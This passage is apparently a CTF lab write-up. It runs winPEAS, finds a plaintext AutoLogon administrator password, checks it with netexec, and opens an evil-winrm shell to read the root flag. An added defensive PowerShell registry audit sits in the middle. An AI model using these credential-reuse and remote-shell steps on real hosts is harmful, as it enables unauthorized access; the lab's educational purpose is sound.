ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell events - script block logs (EID 4104) - searching for sensitive data.

  [X] Exception: Attempted to perform an unauthorized operation.

ÉÍÍÍÍÍÍÍÍÍ͹ Displaying Power off/on events for last 5 days

System.UnauthorizedAccessException: Attempted to perform an unauthorized operation.
   at System.Diagnostics.Eventing.Reader.EventLogException.Throw(Int32 errorCode)
   at System.Diagnostics.Eventing.Reader.NativeWrapper.EvtQuery(EventLogHandle session, String path, String query, Int32 flags)
   at System.Diagnostics.Eventing.Reader.EventLogReader..ctor(EventLogQuery eventQuery, EventBookmark bookmark)
   at winPEAS.Helpers.MyUtils.GetEventLogReader(String path, String query, String computerName)
   at hq.a.b()
   at i3.a()


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Users Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍ͹ Users
È Check if you have some admin equivalent privileges https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#users--groups
  [X] Exception: Object reference not set to an instance of an object.
  Current user: sysadmin
  Current groups: Domain Users, Everyone, Builtin\Remote Management Users, Users, Builtin\Pre-Windows 2000 Compatible Access, Network, Authenticated Users, This Organization, NTLM Authentication
   =================================================================================================

    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Current User Idle Time
   Current User   :     MEGACHANGE\sysadmin
   Idle Time      :     00h:44m:21s:000ms

ÉÍÍÍÍÍÍÍÍÍ͹ Display Tenant information (DsRegCmd.exe /status)
   Tenant is NOT Azure AD Joined.

ÉÍÍÍÍÍÍÍÍÍ͹ Current Token privileges
È Check if you can escalate privilege using some enabled token https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#token-manipulation
    SeMachineAccountPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeIncreaseWorkingSetPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED

ÉÍÍÍÍÍÍÍÍÍ͹ Clipboard text

ÉÍÍÍÍÍÍÍÍÍ͹ Logged users
  [X] Exception: Access denied 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Display information about local users
   Computer Name           :   CHANGE
   User Name               :   Administrator
   User Id                 :   500
   Is Enabled              :   True
   User Type               :   Administrator
   Comment                 :   Built-in account for administering the computer/domain
   Last Logon              :   3/7/2025 9:04:04 PM
   Logons Count            :   15
   Password Last Set       :   3/7/2025 7:53:34 PM

   =================================================================================================

   Computer Name           :   CHANGE
   User Name               :   Guest
   User Id                 :   501
   Is Enabled              :   False
   User Type               :   Guest
   Comment                 :   Built-in account for guest access to the computer/domain
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================

   Computer Name           :   CHANGE
   User Name               :   krbtgt
   User Id                 :   502
   Is Enabled              :   False
   User Type               :   User
   Comment                 :   Key Distribution Center Service Account
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   3/7/2025 2:00:47 PM

   =================================================================================================

   Computer Name           :   CHANGE
   User Name               :   alfredo
   User Id                 :   1103
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   6/28/2025 1:01:08 PM
   Logons Count            :   2
   Password Last Set       :   3/7/2025 7:57:14 PM

   =================================================================================================

   Computer Name           :   CHANGE
   User Name               :   sysadmin
   User Id                 :   1104
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   6/28/2025 12:34:39 PM
   Logons Count            :   0
   Password Last Set       :   6/28/2025 12:33:31 PM

   =================================================================================================


ÉÍÍÍÍÍÍÍÍÍ͹ RDP Sessions
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Ever logged users
  [X] Exception: Access denied 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Home folders found
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\Public
    C:\Users\sysadmin : sysadmin [Allow: AllAccess]
Gotcha! I have discovered the administrator's username and password in the AutoLogon section of the winPEAS output, as you can see below:
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName    :    MEGACHANGE
    DefaultUserName      :    administrator
    DefaultPassword      :    d0m@in_c0ntr0ll3r
Now we have to verify that the discovered password is valid, using the netexec command you can see below.
┌──(root㉿kali)-[/home/luis/Descargas]
└─# netexec smb 192.168.88.7 -u administrator -p d0m@in_c0ntr0ll3r
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\administrator:d0m@in_c0ntr0ll3r (Pwn3d!)

┌──(root㉿kali)-[/home/luis/Descargas]
└─# netexec smb evil-winrm 192.168.88.7 -u administrator -p d0m@in_c0ntr0ll3r
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\administrator:d0m@in_c0ntr0ll3r (Pwn3d!)
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
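The AutoLogon finding above, together with the LSA Protection, WDigest, cached-credential and signing settings that winPEAS reported earlier as disabled or weak, can be re-checked from the defender's side with the following PowerShell audit. This is an added example, not code from the original writeup or from winPEAS: the registry paths and value names are the documented Windows locations, while the "Wanted" values and the cached-logon threshold are assumptions reflecting a common hardening baseline, not anything the page states.

```powershell
# Added example (not part of the original writeup, and not winPEAS code): a read-only
# PowerShell audit that re-checks, from the defender's side, what winPEAS reported above:
# plaintext AutoLogon credentials in the Winlogon key, plus the credential-protection
# settings it listed as disabled or weak. Registry paths and value names are the
# documented Windows locations; the "Wanted" values are assumed hardening targets.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    try {
        (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name
    } catch {
        $null   # key or value absent; the caller applies the Windows default
    }
}

$Winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Test-AutoLogon {
    # AutoLogon keeps its settings under Winlogon. A DefaultPassword stored there as a
    # plain REG_SZ is readable by any local user, which is exactly what winPEAS surfaced.
    [pscustomobject]@{
        AutoAdminLogon    = Get-RegValue $Winlogon 'AutoAdminLogon'
        DefaultDomainName = Get-RegValue $Winlogon 'DefaultDomainName'
        DefaultUserName   = Get-RegValue $Winlogon 'DefaultUserName'
        PlaintextPassword = ($null -ne (Get-RegValue $Winlogon 'DefaultPassword'))
    }
}

function Test-CredentialHardening {
    # One row per setting: where it lives, the assumed hardened value, and the value
    # Windows (8.1 / 2012 R2 and later) applies when the entry is missing.
    $checks = @(
        @{ Name = 'LSA Protection (RunAsPPL)';         Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';                           Value = 'RunAsPPL';                 Want = 1; Default = 0 }
        @{ Name = 'WDigest UseLogonCredential';        Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest';     Value = 'UseLogonCredential';       Want = 0; Default = 0 }
        @{ Name = 'SMB client signing required';       Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'; Value = 'RequireSecuritySignature'; Want = 1; Default = 0 }
        @{ Name = 'LDAP client signing (2 = require)'; Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LDAP';                         Value = 'LDAPClientIntegrity';      Want = 2; Default = 1 }
    )
    foreach ($c in $checks) {
        $actual = Get-RegValue $c.Path $c.Value
        if ($null -eq $actual) { $actual = $c.Default }
        $status = if ([int]$actual -eq $c.Want) { 'OK' } else { 'REVIEW' }
        [pscustomobject]@{ Check = $c.Name; Actual = $actual; Wanted = $c.Want; Status = $status }
    }

    # CachedLogonsCount is a REG_SZ under Winlogon; winPEAS showed the default of 10.
    # The threshold of 4 is an assumed baseline for domain-joined servers.
    $cached = Get-RegValue $Winlogon 'CachedLogonsCount'
    if ($null -eq $cached) { $cached = '10' }
    $status = if ([int]$cached -le 4) { 'OK' } else { 'REVIEW' }
    [pscustomobject]@{ Check = 'CachedLogonsCount'; Actual = $cached; Wanted = '<= 4'; Status = $status }
}

# Usage: run from an elevated prompt on the host being audited.
Test-AutoLogon | Format-List
Test-CredentialHardening | Format-Table -AutoSize
```

If Test-AutoLogon reports PlaintextPassword as True, the cleartext value is readable by every interactive user on the host, which is how a non-privileged run of winPEAS surfaced it here; the rows marked REVIEW map one-to-one onto the "not enabled" and "ClientRequireSigning: False" lines in the output above.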
Now we should be able to get a shell on the Windows machine over WinRM (port 5985 was open in the nmap scan); to do so, execute the command you can see below:
  • evil-winrm -i 192.168.88.7 -u administrator -p d0m@in_c0ntr0ll3r
┌──(root㉿kali)-[/home/luis/Descargas]
└─# evil-winrm -i 192.168.88.7 -u administrator -p d0m@in_c0ntr0ll3r
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         3/7/2025   9:25 PM                3D Objects
d-r---         3/7/2025   9:25 PM                Contacts
d-r---         3/7/2025   9:25 PM                Desktop
d-r---         3/7/2025   9:25 PM                Documents
d-r---         3/7/2025   9:25 PM                Downloads
d-r---         3/7/2025   9:25 PM                Favorites
d-r---         3/7/2025   9:25 PM                Links
d-r---         3/7/2025   9:25 PM                Music
d-r---         3/7/2025   9:25 PM                Pictures
d-r---         3/7/2025   9:25 PM                Saved Games
d-r---         3/7/2025   9:25 PM                Searches
d-r---         3/7/2025   9:25 PM                Videos


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/7/2025   6:23 PM             70 root.txt


Gotcha! I have found the root flag, as you can see below, in this path:
  • C:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
79bf6f60850f10211c290be19ccf8b95
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
megachange\administrator
Thank you very much for reading this article.

I hope you liked it and learned something new.

This article has been written for ethical purposes.

Good Hack
